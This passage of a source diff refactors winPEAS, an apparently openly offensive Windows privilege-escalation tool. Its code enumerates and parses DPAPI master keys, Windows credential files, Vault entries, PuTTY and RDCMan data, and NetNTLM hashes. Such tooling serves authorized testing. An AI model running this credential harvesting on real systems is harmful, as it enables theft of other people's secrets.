+                                                Marshal.ReleaseComObject(shortcut);
+                                                shortcut = null;
                                             }
-                                            Marshal.ReleaseComObject(shortcut);
-                                            shortcut = null;
                                         }
                                     }
                                 }
@@ -180,33 +183,35 @@ namespace winPEAS.KnownFileCreds
                 }
                 else
                 {
-                    string recentPath = string.Format("{0}\\Microsoft\\Windows\\Recent\\", System.Environment.GetEnvironmentVariable("APPDATA"));
+                    string recentPath = string.Format("{0}\\Microsoft\\Windows\\Recent\\", Environment.GetEnvironmentVariable("APPDATA"));
-
+                    if (Directory.Exists(recentPath))
-                    var recentFiles = Directory.EnumerateFiles(recentPath, "*.lnk", SearchOption.AllDirectories);
-
-                    foreach (string recentFile in recentFiles)
                     {
-                        // old method (needed interop dll)
+                        var recentFiles = Directory.EnumerateFiles(recentPath, "*.lnk", SearchOption.AllDirectories);
-                        //WshShell shell = new WshShell();
-                        //IWshShortcut shortcut = (IWshShortcut)shell.CreateShortcut(recentFile);
 
-                        DateTime lastAccessed = System.IO.File.GetLastAccessTime(recentFile);
+                        foreach (string recentFile in recentFiles)
-
-                        if (lastAccessed > startTime)
                         {
-                            // invoke the WshShell com object, creating a shortcut to then extract the TargetPath from
+                            // old method (needed interop dll)
-                            Object shortcut = shellObj.GetType().InvokeMember("CreateShortcut", BindingFlags.InvokeMethod, null, shellObj, new object[] { recentFile });
+                            //WshShell shell = new WshShell();
-                            Object TargetPath = shortcut.GetType().InvokeMember("TargetPath", BindingFlags.GetProperty, null, shortcut, new object[] { });
+                            //IWshShortcut shortcut = (IWshShortcut)shell.CreateShortcut(recentFile);
-                            if (TargetPath.ToString().Trim() != "")
+
+                            DateTime lastAccessed = File.GetLastAccessTime(recentFile);
+
+                            if (lastAccessed > startTime)
                             {
-                                results.Add(new Dictionary<string, string>()
+                                // invoke the WshShell com object, creating a shortcut to then extract the TargetPath from
+                                Object shortcut = shellObj.GetType().InvokeMember("CreateShortcut", BindingFlags.InvokeMethod, null, shellObj, new object[] { recentFile });
+                                Object TargetPath = shortcut.GetType().InvokeMember("TargetPath", BindingFlags.GetProperty, null, shortcut, new object[] { });
+                                if (TargetPath.ToString().Trim() != "")
+                                {
+                                    results.Add(new Dictionary<string, string>()
                                 {
                                     { "Target", TargetPath.ToString() },
                                     { "Accessed", string.Format("{0}", lastAccessed) }
                                 });
+                                }
+                                Marshal.ReleaseComObject(shortcut);
+                                shortcut = null;
                             }
-                            Marshal.ReleaseComObject(shortcut);
-                            shortcut = null;
                         }
                     }
                 }
@@ -237,13 +242,15 @@ namespace winPEAS.KnownFileCreds
                         string userName = parts[parts.Length - 1];
                         if (!(dir.EndsWith("Public") || dir.EndsWith("Default") || dir.EndsWith("Default User") || dir.EndsWith("All Users")))
                         {
-                            List<string> userDPAPIBasePaths = new List<string>();
+                            List<string> userDPAPIBasePaths = new List<string>
-                            userDPAPIBasePaths.Add(string.Format("{0}\\AppData\\Roaming\\Microsoft\\Protect\\", System.Environment.GetEnvironmentVariable("USERPROFILE")));
+                            {
-                            userDPAPIBasePaths.Add(string.Format("{0}\\AppData\\Local\\Microsoft\\Protect\\", System.Environment.GetEnvironmentVariable("USERPROFILE")));
+                                string.Format("{0}\\AppData\\Roaming\\Microsoft\\Protect\\", Environment.GetEnvironmentVariable("USERPROFILE")),
+                                string.Format("{0}\\AppData\\Local\\Microsoft\\Protect\\", Environment.GetEnvironmentVariable("USERPROFILE"))
+                            };
 
                             foreach (string userDPAPIBasePath in userDPAPIBasePaths)
                             {
-                                if (System.IO.Directory.Exists(userDPAPIBasePath))
+                                if (Directory.Exists(userDPAPIBasePath))
                                 {
                                     var directories = Directory.EnumerateDirectories(userDPAPIBasePath);
                                     foreach (string directory in directories)
@@ -254,9 +261,9 @@ namespace winPEAS.KnownFileCreds
                                         {
                                             if (Regex.IsMatch(file, @"[0-9A-Fa-f]{8}[-][0-9A-Fa-f]{4}[-][0-9A-Fa-f]{4}[-][0-9A-Fa-f]{4}[-][0-9A-Fa-f]{12}"))
                                             {
-                                                DateTime lastAccessed = System.IO.File.GetLastAccessTime(file);
+                                                DateTime lastAccessed = File.GetLastAccessTime(file);
-                                                DateTime lastModified = System.IO.File.GetLastWriteTime(file);
+                                                DateTime lastModified = File.GetLastWriteTime(file);
-                                                string fileName = System.IO.Path.GetFileName(file);
+                                                string fileName = Path.GetFileName(file);
                                                 results.Add(new Dictionary<string, string>()
                                                 {
                                                     { "MasterKey", file },
@@ -274,13 +281,15 @@ namespace winPEAS.KnownFileCreds
                 else
                 {
                     string userName = Environment.GetEnvironmentVariable("USERNAME");
-                    List<string> userDPAPIBasePaths = new List<string>();
+                    List<string> userDPAPIBasePaths = new List<string>
-                    userDPAPIBasePaths.Add(string.Format("{0}\\AppData\\Roaming\\Microsoft\\Protect\\", System.Environment.GetEnvironmentVariable("USERPROFILE")));
-                    userDPAPIBasePaths.Add(string.Format("{0}\\AppData\\Local\\Microsoft\\Protect\\", System.Environment.GetEnvironmentVariable("USERPROFILE")));
-
-                    foreach (string userDPAPIBasePath in userDPAPIBasePaths) 
                     {
-                        if (System.IO.Directory.Exists(userDPAPIBasePath))
+                        string.Format("{0}\\AppData\\Roaming\\Microsoft\\Protect\\", Environment.GetEnvironmentVariable("USERPROFILE")),
+                        string.Format("{0}\\AppData\\Local\\Microsoft\\Protect\\", Environment.GetEnvironmentVariable("USERPROFILE"))
+                    };
+
+                    foreach (string userDPAPIBasePath in userDPAPIBasePaths)
+                    {
+                        if (Directory.Exists(userDPAPIBasePath))
                         {
                             var directories = Directory.EnumerateDirectories(userDPAPIBasePath);
                             foreach (string directory in directories)
@@ -291,9 +300,9 @@ namespace winPEAS.KnownFileCreds
                                 {
                                     if (Regex.IsMatch(file, @"[0-9A-Fa-f]{8}[-][0-9A-Fa-f]{4}[-][0-9A-Fa-f]{4}[-][0-9A-Fa-f]{4}[-][0-9A-Fa-f]{12}"))
                                     {
-                                        DateTime lastAccessed = System.IO.File.GetLastAccessTime(file);
+                                        DateTime lastAccessed = File.GetLastAccessTime(file);
-                                        DateTime lastModified = System.IO.File.GetLastWriteTime(file);
+                                        DateTime lastModified = File.GetLastWriteTime(file);
-                                        string fileName = System.IO.Path.GetFileName(file);
+                                        string fileName = Path.GetFileName(file);
                                         results.Add(new Dictionary<string, string>()
                                     {
                                         { "MasterKey", file },
@@ -331,23 +340,25 @@ namespace winPEAS.KnownFileCreds
                         string userName = parts[parts.Length - 1];
                         if (!(dir.EndsWith("Public") || dir.EndsWith("Default") || dir.EndsWith("Default User") || dir.EndsWith("All Users")))
                         {
-                            List<string> userCredFilePaths = new List<string>();
+                            List<string> userCredFilePaths = new List<string>
-                            userCredFilePaths.Add(string.Format("{0}\\AppData\\Local\\Microsoft\\Credentials\\", dir));
+                            {
-                            userCredFilePaths.Add(string.Format("{0}\\AppData\\Roaming\\Microsoft\\Credentials\\", dir));
+                                string.Format("{0}\\AppData\\Local\\Microsoft\\Credentials\\", dir),
+                                string.Format("{0}\\AppData\\Roaming\\Microsoft\\Credentials\\", dir)
+                            };
 
                             foreach (string userCredFilePath in userCredFilePaths)
                             {
-                                if (System.IO.Directory.Exists(userCredFilePath))
+                                if (Directory.Exists(userCredFilePath))
                                 {
                                     var systemFiles = Directory.EnumerateFiles(userCredFilePath);
                                     if ((systemFiles != null))
                                     {
                                         foreach (string file in systemFiles)
                                         {
-                                            DateTime lastAccessed = System.IO.File.GetLastAccessTime(file);
+                                            DateTime lastAccessed = File.GetLastAccessTime(file);
-                                            DateTime lastModified = System.IO.File.GetLastWriteTime(file);
+                                            DateTime lastModified = File.GetLastWriteTime(file);
-                                            long size = new System.IO.FileInfo(file).Length;
+                                            long size = new FileInfo(file).Length;
-                                            string fileName = System.IO.Path.GetFileName(file);
+                                            string fileName = Path.GetFileName(file);
 
                                             // jankily parse the bytes to extract the credential type and master key GUID
                                             // reference- https://github.com/gentilkiwi/mimikatz/blob/3d8be22fff9f7222f9590aa007629e18300cf643/modules/kull_m_dpapi.h#L24-L54
@@ -381,49 +392,54 @@ namespace winPEAS.KnownFileCreds
                     }
 
                     string systemFolder = string.Format("{0}\\System32\\config\\systemprofile\\AppData\\Local\\Microsoft\\Credentials", Environment.GetEnvironmentVariable("SystemRoot"));
-                    var files = Directory.EnumerateFiles(systemFolder);
+                    if (Directory.Exists(systemFolder))
-                    if ((files != null))
                     {
-                        foreach (string file in files)
+                        var files = Directory.EnumerateFiles(systemFolder);
+                        if ((files != null))
                         {
-                            DateTime lastAccessed = System.IO.File.GetLastAccessTime(file);
+                            foreach (string file in files)
-                            DateTime lastModified = System.IO.File.GetLastWriteTime(file);
-                            long size = new System.IO.FileInfo(file).Length;
-                            string fileName = System.IO.Path.GetFileName(file);
-
-                            // jankily parse the bytes to extract the credential type and master key GUID
-                            // reference- https://github.com/gentilkiwi/mimikatz/blob/3d8be22fff9f7222f9590aa007629e18300cf643/modules/kull_m_dpapi.h#L24-L54
-                            byte[] credentialArray = File.ReadAllBytes(file);
-                            byte[] guidMasterKeyArray = new byte[16];
-                            Array.Copy(credentialArray, 36, guidMasterKeyArray, 0, 16);
-                            Guid guidMasterKey = new Guid(guidMasterKeyArray);
-
-                            byte[] stringLenArray = new byte[16];
-                            Array.Copy(credentialArray, 56, stringLenArray, 0, 4);
-                            int descLen = BitConverter.ToInt32(stringLenArray, 0);
-
-                            byte[] descBytes = new byte[descLen];
-                            Array.Copy(credentialArray, 60, descBytes, 0, descLen - 4);
-
-                            string desc = Encoding.Unicode.GetString(descBytes);
-                            results.Add(new Dictionary<string, string>()
                             {
-                                { "CredFile", file },
+                                DateTime lastAccessed = File.GetLastAccessTime(file);
-                                { "Description", desc },
+                                DateTime lastModified = File.GetLastWriteTime(file);
-                                { "MasterKey", string.Format("{0}", guidMasterKey) },
+                                long size = new System.IO.FileInfo(file).Length;
-                                { "Accessed", string.Format("{0}", lastAccessed) },
+                                string fileName = Path.GetFileName(file);
-                                { "Modified", string.Format("{0}", lastModified) },
+
-                                { "Size", string.Format("{0}", size) },
+                                // jankily parse the bytes to extract the credential type and master key GUID
-                            });
+                                // reference- https://github.com/gentilkiwi/mimikatz/blob/3d8be22fff9f7222f9590aa007629e18300cf643/modules/kull_m_dpapi.h#L24-L54
+                                byte[] credentialArray = File.ReadAllBytes(file);
+                                byte[] guidMasterKeyArray = new byte[16];
+                                Array.Copy(credentialArray, 36, guidMasterKeyArray, 0, 16);
+                                Guid guidMasterKey = new Guid(guidMasterKeyArray);
+
+                                byte[] stringLenArray = new byte[16];
+                                Array.Copy(credentialArray, 56, stringLenArray, 0, 4);
+                                int descLen = BitConverter.ToInt32(stringLenArray, 0);
+
+                                byte[] descBytes = new byte[descLen];
+                                Array.Copy(credentialArray, 60, descBytes, 0, descLen - 4);
+
+                                string desc = Encoding.Unicode.GetString(descBytes);
+                                results.Add(new Dictionary<string, string>()
+                                {
+                                    { "CredFile", file },
+                                    { "Description", desc },
+                                    { "MasterKey", string.Format("{0}", guidMasterKey) },
+                                    { "Accessed", string.Format("{0}", lastAccessed) },
+                                    { "Modified", string.Format("{0}", lastModified) },
+                                    { "Size", string.Format("{0}", size) },
+                                });
+                            }
                         }
                     }
                 }
                 else
                 {
                     string userName = Environment.GetEnvironmentVariable("USERNAME");
-                    List<string> userCredFilePaths = new List<string>();
+                    List<string> userCredFilePaths = new List<string>
-                    userCredFilePaths.Add(string.Format("{0}\\AppData\\Local\\Microsoft\\Credentials\\", System.Environment.GetEnvironmentVariable("USERPROFILE")));
+                    {
-                    userCredFilePaths.Add(string.Format("{0}\\AppData\\Roaming\\Microsoft\\Credentials\\", System.Environment.GetEnvironmentVariable("USERPROFILE")));
+                        string.Format("{0}\\AppData\\Local\\Microsoft\\Credentials\\", Environment.GetEnvironmentVariable("USERPROFILE")),
+                        string.Format("{0}\\AppData\\Roaming\\Microsoft\\Credentials\\", Environment.GetEnvironmentVariable("USERPROFILE"))
+                    };
 
                     foreach (string userCredFilePath in userCredFilePaths)
                     {
@@ -433,10 +449,10 @@ namespace winPEAS.KnownFileCreds
 
                             foreach (string file in files)
                             {
-                                DateTime lastAccessed = System.IO.File.GetLastAccessTime(file);
+                                DateTime lastAccessed = File.GetLastAccessTime(file);
-                                DateTime lastModified = System.IO.File.GetLastWriteTime(file);
+                                DateTime lastModified = File.GetLastWriteTime(file);
                                 long size = new System.IO.FileInfo(file).Length;
-                                string fileName = System.IO.Path.GetFileName(file);
+                                string fileName = Path.GetFileName(file);
 
                                 // jankily parse the bytes to extract the credential type and master key GUID
                                 // reference- https://github.com/gentilkiwi/mimikatz/blob/3d8be22fff9f7222f9590aa007629e18300cf643/modules/kull_m_dpapi.h#L24-L54
@@ -472,6 +488,6 @@ namespace winPEAS.KnownFileCreds
                 Beaprint.PrintException(ex.Message);
             }
             return results;
-        }              
+        }
     }
 }

winPEAS/winPEASexe/winPEAS/KnownFileCreds/Putty.cs

@@ -1,6 +1,6 @@
-using System;
+using Microsoft.Win32;
+using System;
 using System.Collections.Generic;
-using Microsoft.Win32;
 using winPEAS.Helpers;
 using winPEAS.Helpers.Registry;
 
@@ -20,7 +20,7 @@ namespace winPEAS.KnownFileCreds
             try
             {
                 Beaprint.MainPrint("Putty Sessions");
-                List<Dictionary<string, string>> putty_sess = Putty.GetPuttySessions();
+                List<Dictionary<string, string>> putty_sess = GetPuttySessions();
 
                 Dictionary<string, string> colorF = new Dictionary<string, string>()
                         {
@@ -39,7 +39,7 @@ namespace winPEAS.KnownFileCreds
             try
             {
                 Beaprint.MainPrint("Putty SSH Host keys");
-                List<Dictionary<string, string>> putty_sess = Putty.ListPuttySSHHostKeys();
+                List<Dictionary<string, string>> putty_sess = ListPuttySSHHostKeys();
                 Dictionary<string, string> colorF = new Dictionary<string, string>()
                         {
                             { ".*", Beaprint.ansi_color_bad },
@@ -182,8 +182,10 @@ namespace winPEAS.KnownFileCreds
                         Dictionary<string, object> hostKeys = RegistryHelper.GetRegValues("HKU", string.Format("{0}\\Software\\SimonTatham\\PuTTY\\SshHostKeys\\", SID));
                         if ((hostKeys != null) && (hostKeys.Count != 0))
                         {
-                            Dictionary<string, string> putty_ssh = new Dictionary<string, string>();
+                            Dictionary<string, string> putty_ssh = new Dictionary<string, string>
-                            putty_ssh["UserSID"] = SID;
+                            {
+                                ["UserSID"] = SID
+                            };
                             foreach (KeyValuePair<string, object> kvp in hostKeys)
                             {
                                 putty_ssh[kvp.Key] = ""; //Looks like only matters the key name, not the value

winPEAS/winPEASexe/winPEAS/KnownFileCreds/RemoteDesktop.cs

@@ -1,8 +1,8 @@
-using System;
+using Microsoft.Win32;
+using System;
 using System.Collections.Generic;
 using System.IO;
 using System.Xml;
-using Microsoft.Win32;
 using winPEAS.Helpers;
 using winPEAS.Helpers.Registry;
 
@@ -77,7 +77,7 @@ namespace winPEAS.KnownFileCreds
                         if (!(dir.EndsWith("Public") || dir.EndsWith("Default") || dir.EndsWith("Default User") || dir.EndsWith("All Users")))
                         {
                             string userRDManFile = string.Format("{0}\\AppData\\Local\\Microsoft\\Remote Desktop Connection Manager\\RDCMan.settings", dir);
-                            if (System.IO.File.Exists(userRDManFile))
+                            if (File.Exists(userRDManFile))
                             {
                                 XmlDocument xmlDoc = new XmlDocument();
                                 xmlDoc.Load(userRDManFile);
@@ -87,8 +87,8 @@ namespace winPEAS.KnownFileCreds
                                 XmlNodeList items = filesToOpen[0].ChildNodes;
                                 XmlNode node = items[0];
 
-                                DateTime lastAccessed = System.IO.File.GetLastAccessTime(userRDManFile);
+                                DateTime lastAccessed = File.GetLastAccessTime(userRDManFile);
-                                DateTime lastModified = System.IO.File.GetLastWriteTime(userRDManFile);
+                                DateTime lastModified = File.GetLastWriteTime(userRDManFile);
                                 Dictionary<string, string> rdg = new Dictionary<string, string>(){
                                     { "RDCManFile", userRDManFile },
                                     { "Accessed", string.Format("{0}", lastAccessed) },
@@ -107,9 +107,9 @@ namespace winPEAS.KnownFileCreds
                 else
                 {
                     string userName = Environment.GetEnvironmentVariable("USERNAME");
-                    string userRDManFile = string.Format("{0}\\AppData\\Local\\Microsoft\\Remote Desktop Connection Manager\\RDCMan.settings", System.Environment.GetEnvironmentVariable("USERPROFILE"));
+                    string userRDManFile = string.Format("{0}\\AppData\\Local\\Microsoft\\Remote Desktop Connection Manager\\RDCMan.settings", Environment.GetEnvironmentVariable("USERPROFILE"));
 
-                    if (System.IO.File.Exists(userRDManFile))
+                    if (File.Exists(userRDManFile))
                     {
                         XmlDocument xmlDoc = new XmlDocument();
                         xmlDoc.Load(userRDManFile);
@@ -119,8 +119,8 @@ namespace winPEAS.KnownFileCreds
                         XmlNodeList items = filesToOpen[0].ChildNodes;
                         XmlNode node = items[0];
 
-                        DateTime lastAccessed = System.IO.File.GetLastAccessTime(userRDManFile);
+                        DateTime lastAccessed = File.GetLastAccessTime(userRDManFile);
-                        DateTime lastModified = System.IO.File.GetLastWriteTime(userRDManFile);
+                        DateTime lastModified = File.GetLastWriteTime(userRDManFile);
                         Dictionary<string, string> rdg = new Dictionary<string, string>(){
                                     { "RDCManFile", userRDManFile },
                                     { "Accessed", string.Format("{0}", lastAccessed) },

winPEAS/winPEASexe/winPEAS/KnownFileCreds/SecurityPackages/NtlmHashInfo.cs

@@ -9,6 +9,6 @@
         {
             Version = version;
             Hash = hash;
-        }        
+        }
     }
 }

winPEAS/winPEASexe/winPEAS/KnownFileCreds/SecurityPackages/SecBuffer.cs

@@ -2,7 +2,7 @@
 using System.Runtime.InteropServices;
 
 namespace winPEAS.KnownFileCreds.SecurityPackages
-{    
+{
     [StructLayout(LayoutKind.Sequential)]
     public struct SecBuffer : IDisposable
     {

winPEAS/winPEASexe/winPEAS/KnownFileCreds/SecurityPackages/SecurityPackages.cs

@@ -8,7 +8,7 @@ using winPEAS.Native;
 namespace winPEAS.KnownFileCreds.SecurityPackages
 {
     internal class SecurityPackages
-    {        
+    {
         [StructLayout(LayoutKind.Sequential)]
         public struct SECURITY_INTEGER
         {
@@ -30,7 +30,7 @@ namespace winPEAS.KnownFileCreds.SecurityPackages
             if (cred != null)
             {
                 yield return cred;
-            }            
+            }
         }
 
         private static NtlmHashInfo GetNtlmCredentialsInternal(string challenge, bool disableESS)
@@ -142,7 +142,7 @@ namespace winPEAS.KnownFileCreds.SecurityPackages
                     return ParseNTResponse(clientTokenBytes, challenge);
                 }
                 else if (result == SEC_E_NO_CREDENTIALS)
-                {                    
+                {
                     return null;
                 }
                 else if (disableESS)
@@ -209,7 +209,7 @@ namespace winPEAS.KnownFileCreds.SecurityPackages
             {
                 return new NtlmHashInfo(
                     "NetNTLMv2",
-                    FormatNetNtlmV2Hash(challenge, user, domain, SubArray(nt_resp, 0, 16), SubArray(nt_resp,16, nt_resp.Length - 16))
+                    FormatNetNtlmV2Hash(challenge, user, domain, SubArray(nt_resp, 0, 16), SubArray(nt_resp, 16, nt_resp.Length - 16))
                 );
             }
             else
@@ -253,7 +253,7 @@ namespace winPEAS.KnownFileCreds.SecurityPackages
         private static string ByteArrayToString(byte[] ba)
         {
             var hex = new StringBuilder(ba.Length * 2);
-            
+
             foreach (var b in ba)
             {
                 hex.AppendFormat("{0:x2}", b);

winPEAS/winPEASexe/winPEAS/KnownFileCreds/SuperPutty/SuperPutty.cs

@@ -15,7 +15,7 @@ namespace winPEAS.KnownFileCreds.SuperPutty
         private static void PrintConfigurationFiles()
         {
             Beaprint.MainPrint("SuperPutty configuration files");
-            
+
             var dirs = User.GetUsersFolders();
             var filter = "sessions*.xml";
 
@@ -24,11 +24,14 @@ namespace winPEAS.KnownFileCreds.SuperPutty
                 try
                 {
                     var path = $"{dir}\\Documents\\SuperPuTTY\\";
-                    var files = Directory.EnumerateFiles(path, filter, SearchOption.TopDirectoryOnly);
+                    if (Directory.Exists(path))
-
-                    foreach (var file in files)
                     {
-                        Beaprint.BadPrint($"     {file}");
+                        var files = Directory.EnumerateFiles(path, filter, SearchOption.TopDirectoryOnly);
+
+                        foreach (var file in files)
+                        {
+                            Beaprint.BadPrint($"     {file}");
+                        }
                     }
                 }
                 catch (Exception)

winPEAS/winPEASexe/winPEAS/KnownFileCreds/Vault/VaultCli.cs

@@ -45,16 +45,18 @@ namespace winPEAS.KnownFileCreds.Vault
 
                 // Create dictionary to translate Guids to human readable elements
                 IntPtr guidAddress = vaultGuidPtr;
-                Dictionary<Guid, string> vaultSchema = new Dictionary<Guid, string>();
+                Dictionary<Guid, string> vaultSchema = new Dictionary<Guid, string>
-                vaultSchema.Add(new Guid("2F1A6504-0641-44CF-8BB5-3612D865F2E5"), "Windows Secure Note");
+                {
-                vaultSchema.Add(new Guid("3CCD5499-87A8-4B10-A215-608888DD3B55"), "Windows Web Password Credential");
+                    { new Guid("2F1A6504-0641-44CF-8BB5-3612D865F2E5"), "Windows Secure Note" },
-                vaultSchema.Add(new Guid("154E23D0-C644-4E6F-8CE6-5069272F999F"), "Windows Credential Picker Protector");
+                    { new Guid("3CCD5499-87A8-4B10-A215-608888DD3B55"), "Windows Web Password Credential" },
-                vaultSchema.Add(new Guid("4BF4C442-9B8A-41A0-B380-DD4A704DDB28"), "Web Credentials");
+                    { new Guid("154E23D0-C644-4E6F-8CE6-5069272F999F"), "Windows Credential Picker Protector" },
-                vaultSchema.Add(new Guid("77BC582B-F0A6-4E15-4E80-61736B6F3B29"), "Windows Credentials");
+                    { new Guid("4BF4C442-9B8A-41A0-B380-DD4A704DDB28"), "Web Credentials" },
-                vaultSchema.Add(new Guid("E69D7838-91B5-4FC9-89D5-230D4D4CC2BC"), "Windows Domain Certificate Credential");
+                    { new Guid("77BC582B-F0A6-4E15-4E80-61736B6F3B29"), "Windows Credentials" },
-                vaultSchema.Add(new Guid("3E0E35BE-1B77-43E7-B873-AED901B6275B"), "Windows Domain Password Credential");
+                    { new Guid("E69D7838-91B5-4FC9-89D5-230D4D4CC2BC"), "Windows Domain Certificate Credential" },
-                vaultSchema.Add(new Guid("3C886FF3-2669-4AA2-A8FB-3F6759A77548"), "Windows Extended Credential");
+                    { new Guid("3E0E35BE-1B77-43E7-B873-AED901B6275B"), "Windows Domain Password Credential" },
-                vaultSchema.Add(new Guid("00000000-0000-0000-0000-000000000000"), null);
+                    { new Guid("3C886FF3-2669-4AA2-A8FB-3F6759A77548"), "Windows Extended Credential" },
+                    { new Guid("00000000-0000-0000-0000-000000000000"), null }
+                };
 
                 for (int i = 0; i < vaultCount; i++)
                 {
@@ -167,7 +169,7 @@ namespace winPEAS.KnownFileCreds.Vault
                                     vault_cred["PacakgeSid"] = string.Format("{0}", packageSid);
                                 }
                                 vault_cred["Credential"] = string.Format("{0}", cred);
-                                vault_cred["Last Modified"] = string.Format("{0}", System.DateTime.FromFileTimeUtc((long)lastModified));
+                                vault_cred["Last Modified"] = string.Format("{0}", DateTime.FromFileTimeUtc((long)lastModified));
                                 results.Add(vault_cred);
                             }
                         }

winPEAS/winPEASexe/winPEAS/Native/Classes/SafeTokenHandle.cs

@@ -1,15 +1,14 @@
 using System;
 using System.Runtime.InteropServices;
 using winPEAS.Native.Enums;
-using winPEAS.TaskScheduler.TaskEditor.Native;
 
 namespace winPEAS.Native.Classes
 {
-	public partial class SafeTokenHandle :  Microsoft.Win32.SafeHandles.SafeHandleZeroOrMinusOneIsInvalid
+    public partial class SafeTokenHandle : Microsoft.Win32.SafeHandles.SafeHandleZeroOrMinusOneIsInvalid
-	{
+    {
-		private const Int32 ERROR_NO_TOKEN = 0x000003F0;
+        private const Int32 ERROR_NO_TOKEN = 0x000003F0;
-		private const Int32 ERROR_INSUFFICIENT_BUFFER = 122;
+        private const Int32 ERROR_INSUFFICIENT_BUFFER = 122;
-		private static SafeTokenHandle currentProcessToken = null;
+        private static SafeTokenHandle currentProcessToken = null;
 
         private SafeTokenHandle() : base(true) { }
 
@@ -20,102 +19,102 @@ namespace winPEAS.Native.Classes
 
         protected override bool ReleaseHandle() => Kernel32.CloseHandle(handle);
 
-		public T GetInfo<T>(TOKEN_INFORMATION_CLASS type)
+        public T GetInfo<T>(TOKEN_INFORMATION_CLASS type)
-		{
+        {
-			int cbSize = Marshal.SizeOf(typeof(T));
+            int cbSize = Marshal.SizeOf(typeof(T));
-			IntPtr pType = Marshal.AllocHGlobal(cbSize);
+            IntPtr pType = Marshal.AllocHGlobal(cbSize);
 
-			try
+            try
-			{
+            {
-				// Retrieve token information. 
+                // Retrieve token information. 
-				if (!Advapi32.GetTokenInformation(this, type, pType, cbSize, out cbSize))
+                if (!Advapi32.GetTokenInformation(this, type, pType, cbSize, out cbSize))
-					throw new System.ComponentModel.Win32Exception();
+                    throw new System.ComponentModel.Win32Exception();
 
-				// Marshal from native to .NET.
+                // Marshal from native to .NET.
-				switch (type)
+                switch (type)
-				{
+                {
-					case TOKEN_INFORMATION_CLASS.TokenType:
+                    case TOKEN_INFORMATION_CLASS.TokenType:
-					case TOKEN_INFORMATION_CLASS.TokenImpersonationLevel:
+                    case TOKEN_INFORMATION_CLASS.TokenImpersonationLevel:
-					case TOKEN_INFORMATION_CLASS.TokenSessionId:
+                    case TOKEN_INFORMATION_CLASS.TokenSessionId:
-					case TOKEN_INFORMATION_CLASS.TokenSandBoxInert:
+                    case TOKEN_INFORMATION_CLASS.TokenSandBoxInert:
-					case TOKEN_INFORMATION_CLASS.TokenOrigin:
+                    case TOKEN_INFORMATION_CLASS.TokenOrigin:
-					case TOKEN_INFORMATION_CLASS.TokenElevationType:
+                    case TOKEN_INFORMATION_CLASS.TokenElevationType:
-					case TOKEN_INFORMATION_CLASS.TokenHasRestrictions:
+                    case TOKEN_INFORMATION_CLASS.TokenHasRestrictions:
-					case TOKEN_INFORMATION_CLASS.TokenUIAccess:
+                    case TOKEN_INFORMATION_CLASS.TokenUIAccess:
-					case TOKEN_INFORMATION_CLASS.TokenVirtualizationAllowed:
+                    case TOKEN_INFORMATION_CLASS.TokenVirtualizationAllowed:
-					case TOKEN_INFORMATION_CLASS.TokenVirtualizationEnabled:
+                    case TOKEN_INFORMATION_CLASS.TokenVirtualizationEnabled:
-						return (T)Convert.ChangeType(Marshal.ReadInt32(pType), typeof(T));
+                        return (T)Convert.ChangeType(Marshal.ReadInt32(pType), typeof(T));
 
-					case TOKEN_INFORMATION_CLASS.TokenLinkedToken:
+                    case TOKEN_INFORMATION_CLASS.TokenLinkedToken:
-						return (T)Convert.ChangeType(Marshal.ReadIntPtr(pType), typeof(T));
+                        return (T)Convert.ChangeType(Marshal.ReadIntPtr(pType), typeof(T));
 
-					case TOKEN_INFORMATION_CLASS.TokenUser:
+                    case TOKEN_INFORMATION_CLASS.TokenUser:
-					case TOKEN_INFORMATION_CLASS.TokenGroups:
+                    case TOKEN_INFORMATION_CLASS.TokenGroups:
-					case TOKEN_INFORMATION_CLASS.TokenPrivileges:
+                    case TOKEN_INFORMATION_CLASS.TokenPrivileges:
-					case TOKEN_INFORMATION_CLASS.TokenOwner:
+                    case TOKEN_INFORMATION_CLASS.TokenOwner:
-					case TOKEN_INFORMATION_CLASS.TokenPrimaryGroup:
+                    case TOKEN_INFORMATION_CLASS.TokenPrimaryGroup:
-					case TOKEN_INFORMATION_CLASS.TokenDefaultDacl:
+                    case TOKEN_INFORMATION_CLASS.TokenDefaultDacl:
-					case TOKEN_INFORMATION_CLASS.TokenSource:
+                    case TOKEN_INFORMATION_CLASS.TokenSource:
-					case TOKEN_INFORMATION_CLASS.TokenStatistics:
+                    case TOKEN_INFORMATION_CLASS.TokenStatistics:
-					case TOKEN_INFORMATION_CLASS.TokenRestrictedSids:
+                    case TOKEN_INFORMATION_CLASS.TokenRestrictedSids:
-					case TOKEN_INFORMATION_CLASS.TokenGroupsAndPrivileges:
+                    case TOKEN_INFORMATION_CLASS.TokenGroupsAndPrivileges:
-					case TOKEN_INFORMATION_CLASS.TokenElevation:
+                    case TOKEN_INFORMATION_CLASS.TokenElevation:
-					case TOKEN_INFORMATION_CLASS.TokenAccessInformation:
+                    case TOKEN_INFORMATION_CLASS.TokenAccessInformation:
-					case TOKEN_INFORMATION_CLASS.TokenIntegrityLevel:
+                    case TOKEN_INFORMATION_CLASS.TokenIntegrityLevel:
-					case TOKEN_INFORMATION_CLASS.TokenMandatoryPolicy:
+                    case TOKEN_INFORMATION_CLASS.TokenMandatoryPolicy:
-					case TOKEN_INFORMATION_CLASS.TokenLogonSid:
+                    case TOKEN_INFORMATION_CLASS.TokenLogonSid:
-						return (T)Marshal.PtrToStructure(pType, typeof(T));
+                        return (T)Marshal.PtrToStructure(pType, typeof(T));
 
-					case TOKEN_INFORMATION_CLASS.TokenSessionReference:
+                    case TOKEN_INFORMATION_CLASS.TokenSessionReference:
-					case TOKEN_INFORMATION_CLASS.TokenAuditPolicy:
+                    case TOKEN_INFORMATION_CLASS.TokenAuditPolicy:
-					default:
+                    default:
-						return default(T);
+                        return default(T);
-				}
+                }
-			}
+            }
-			finally
+            finally
-			{
+            {
-				Marshal.FreeHGlobal(pType);
+                Marshal.FreeHGlobal(pType);
-			}
+            }
-		}
+        }
 
-		public static SafeTokenHandle FromCurrentProcess(AccessTypes desiredAccess = AccessTypes.TokenDuplicate)
+        public static SafeTokenHandle FromCurrentProcess(AccessTypes desiredAccess = AccessTypes.TokenDuplicate)
-		{
+        {
-			lock (currentProcessToken)
+            lock (currentProcessToken)
-			{
+            {
-				if (currentProcessToken == null)
+                if (currentProcessToken == null)
-					currentProcessToken = FromProcess(Kernel32.GetCurrentProcess(), desiredAccess);
+                    currentProcessToken = FromProcess(Kernel32.GetCurrentProcess(), desiredAccess);
-				return currentProcessToken;
+                return currentProcessToken;
-			}
+            }
-		}
+        }
 
-		public static SafeTokenHandle FromCurrentThread(AccessTypes desiredAccess = AccessTypes.TokenDuplicate, bool openAsSelf = true) 
